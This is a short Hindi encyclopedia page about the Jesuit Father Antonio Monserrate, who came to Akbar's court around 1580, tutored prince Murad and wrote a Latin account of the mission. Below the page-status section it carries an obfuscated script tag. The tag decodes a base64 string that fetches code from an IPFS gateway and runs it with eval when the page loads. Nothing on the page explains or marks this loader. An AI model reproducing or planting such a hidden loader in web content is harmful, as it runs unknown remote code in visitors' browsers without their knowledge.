फ़ादर एंथोनी मोंसेरात

भारत डिस्कवरी प्रस्तुति
(फादर एंथोनी मोंसेरात से पुनर्निर्देशित)
यहाँ जाएँ:भ्रमण, खोजें
  • फ़ादर एंथोनी मोंसेरात 1580 ई. के लगभग मुग़ल दरबार में आया था।
  • वह एक जेशुइट साधु था, जिसे गोआ के पुर्तग़ाली अधिकारियों द्वारा मुग़ल दरबार में भेजा गया था।
  • फ़ादर एंथोनी मोंसेरात को ख़ासतौर पर मुग़ल बादशाह अकबर निमंत्रण पर भेजा गया था।
  • 'मोंसेरात' और उसके सहयोगी 'एकावीना', इन दोनों का अकबर ने भारी स्वागत किया था।
  • अकबर ने अपने दूसरे पुत्र मुराद को पुर्तग़ाली भाषा सीखने के लिए साधु मोंसेरात के सुपुर्द कर दिया था।
  • मोंसेरात कई वर्ष अकबर के दरबार में रहा, और उसने लैटिन भाषा में जेशूइट मिशन का पूरा वृत्तान्त लिखा, जिसका वह सदस्य था।
  • यह विवरण अत्यन्त महत्त्वपूर्ण है, और अकबर के राज्यकाल के बारे में एक समसामयिक स्रोत ग्रन्थ है।
  • मोंसेरात ने अकबर की शक्ल-सूरत, पोशाक, धार्मिक मान्यताओं, शहज़ादों व शहज़ादियों की शिक्षा आदि के बारे में विस्तार से लिखा है।
  • वह अकबर के साथ काबुल अभियान पर भी गया था।
  • उसने मुग़लकालीन शासन व्यवस्था, डाक वाहकों, जल घड़ी तथा नवरोज के उत्सव को भी उल्लिखित किया है।


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

टीका टिप्पणी और संदर्भ

संबंधित लेख